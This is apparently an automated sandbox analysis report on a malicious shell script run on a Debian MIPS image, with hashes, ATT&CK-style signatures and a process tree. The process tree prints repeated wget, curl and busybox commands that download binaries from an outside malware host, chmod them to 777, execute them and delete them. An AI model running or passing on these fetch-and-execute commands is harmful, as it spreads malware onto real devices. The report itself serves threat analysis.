Analysis
-
max time kernel
124s -
max time network
144s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
29/10/2024, 02:30
Static task
static1
Behavioral task
behavioral1
Sample
754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh
-
Size
10KB
-
MD5
d41afa47fc6a06a1cfb7b25f1b6510db
-
SHA1
1ef345877ccc2780055713bec262b92657b1e4a1
-
SHA256
754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a
-
SHA512
5ce676421868d2fd93aaf0307d70c8f856c56a53859c0275e01f4c1fe15644ee25c18c06208b6e0a579333df7622d73b330cf65c898bb939f2f4fd773f4de320
-
SSDEEP
96:YlFdLqi3SYL4L5RK/VV1oLDfVVjV/VBziTzDYmLxi2mDxTvni6iUpBYKCak8LHbN:SI6/2FO1Y0q0/cl1GC
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 17 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 892 chmod 900 chmod 922 chmod 931 chmod 766 chmod 788 chmod 875 chmod 907 chmod 914 chmod 739 chmod 884 chmod 939 chmod 747 chmod 814 chmod 826 chmod 833 chmod 849 chmod -
Executes dropped EXE 17 IoCs
ioc pid Process /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA 740 QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ 748 BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F 767 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw 789 VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw /tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3 816 fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3 /tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP 827 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP /tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q 834 NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q /tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB 850 HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 876 gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 /tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em 885 Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em /tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ 893 hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx 901 XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx /tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD 908 nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD /tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l 915 DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA 923 QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ 932 BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F 940 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 53 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 910 wget 911 curl 926 curl 771 wget 793 wget 855 wget 744 curl 832 busybox 888 wget 897 curl 776 curl 830 curl 913 busybox 929 busybox 829 wget 906 busybox 938 busybox 752 curl 761 busybox 785 busybox 820 wget 743 wget 944 curl 812 busybox 921 busybox 925 wget 936 curl 715 wget 881 curl 889 curl 896 wget 918 wget 737 busybox 822 curl 861 curl 899 busybox 904 curl 919 curl 943 wget 880 wget 845 busybox 870 busybox 883 busybox 746 busybox 837 curl 799 curl 825 busybox 751 wget 836 wget 935 wget 891 busybox 903 wget 724 curl -
Writes file to tmp directory 17 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ curl File opened for modification /tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD curl File opened for modification /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA curl File opened for modification /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F curl File opened for modification /tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB curl File opened for modification /tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em curl File opened for modification /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA curl File opened for modification /tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q curl File opened for modification /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw curl File opened for modification /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 curl File opened for modification /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx curl File opened for modification /tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l curl File opened for modification /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ curl File opened for modification /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F curl File opened for modification /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ curl File opened for modification /tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3 curl File opened for modification /tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP curl
Processes
-
/tmp/754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh/tmp/754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh1⤵PID:707
-
/bin/rm/bin/rm bins.sh2⤵PID:713
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- System Network Configuration Discovery
PID:715
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:724
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- System Network Configuration Discovery
PID:737
-
-
/bin/chmodchmod 777 QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA./QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- Executes dropped EXE
PID:740
-
-
/bin/rmrm QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵PID:742
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- System Network Configuration Discovery
PID:743
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- System Network Configuration Discovery
PID:746
-
-
/bin/chmodchmod 777 BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ./BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵PID:750
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- System Network Configuration Discovery
PID:751
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:752
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- System Network Configuration Discovery
PID:761
-
-
/bin/chmodchmod 777 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- File and Directory Permissions Modification
PID:766
-
-
/tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F./37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- Executes dropped EXE
PID:767
-
-
/bin/rmrm 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵PID:769
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- System Network Configuration Discovery
PID:771
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:776
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- System Network Configuration Discovery
PID:785
-
-
/bin/chmodchmod 777 VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- File and Directory Permissions Modification
PID:788
-
-
/tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw./VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- Executes dropped EXE
PID:789
-
-
/bin/rmrm VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵PID:791
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- System Network Configuration Discovery
PID:793
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:799
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- System Network Configuration Discovery
PID:812
-
-
/bin/chmodchmod 777 fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3./fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- Executes dropped EXE
PID:816
-
-
/bin/rmrm fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵PID:819
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- System Network Configuration Discovery
PID:820
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:822
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- System Network Configuration Discovery
PID:825
-
-
/bin/chmodchmod 777 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP./5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- Executes dropped EXE
PID:827
-
-
/bin/rmrm 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵PID:828
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- System Network Configuration Discovery
PID:829
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:830
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- System Network Configuration Discovery
PID:832
-
-
/bin/chmodchmod 777 NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- File and Directory Permissions Modification
PID:833
-
-
/tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q./NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- Executes dropped EXE
PID:834
-
-
/bin/rmrm NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵PID:835
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- System Network Configuration Discovery
PID:836
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:837
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- System Network Configuration Discovery
PID:845
-
-
/bin/chmodchmod 777 HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB./HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- Executes dropped EXE
PID:850
-
-
/bin/rmrm HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵PID:853
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- System Network Configuration Discovery
PID:855
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- System Network Configuration Discovery
PID:870
-
-
/bin/chmodchmod 777 gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6./gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵PID:879
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- System Network Configuration Discovery
PID:880
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- System Network Configuration Discovery
PID:883
-
-
/bin/chmodchmod 777 Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em./Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵PID:887
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- System Network Configuration Discovery
PID:888
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- System Network Configuration Discovery
PID:891
-
-
/bin/chmodchmod 777 hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ./hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵PID:895
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- System Network Configuration Discovery
PID:896
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- System Network Configuration Discovery
PID:899
-
-
/bin/chmodchmod 777 XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- File and Directory Permissions Modification
PID:900
-
-
/tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx./XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- Executes dropped EXE
PID:901
-
-
/bin/rmrm XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵PID:902
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- System Network Configuration Discovery
PID:903
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:904
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- System Network Configuration Discovery
PID:906
-
-
/bin/chmodchmod 777 nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD./nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵PID:909
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- System Network Configuration Discovery
PID:910
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- System Network Configuration Discovery
PID:913
-
-
/bin/chmodchmod 777 DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l./DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵PID:917
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- System Network Configuration Discovery
PID:918
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- System Network Configuration Discovery
PID:921
-
-
/bin/chmodchmod 777 QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA./QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵PID:924
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- System Network Configuration Discovery
PID:925
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- System Network Configuration Discovery
PID:929
-
-
/bin/chmodchmod 777 BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ./BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵PID:934
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- System Network Configuration Discovery
PID:935
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- System Network Configuration Discovery
PID:938
-
-
/bin/chmodchmod 777 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F./37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵PID:942
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- System Network Configuration Discovery
PID:943
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:944
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
16B
MD57689ca8c5bc85cf6b78ef89323d4df6a
SHA1a1392ec3b571b3de167f0b9a5dadab4f14a2db76
SHA25617dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5
SHA51240f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97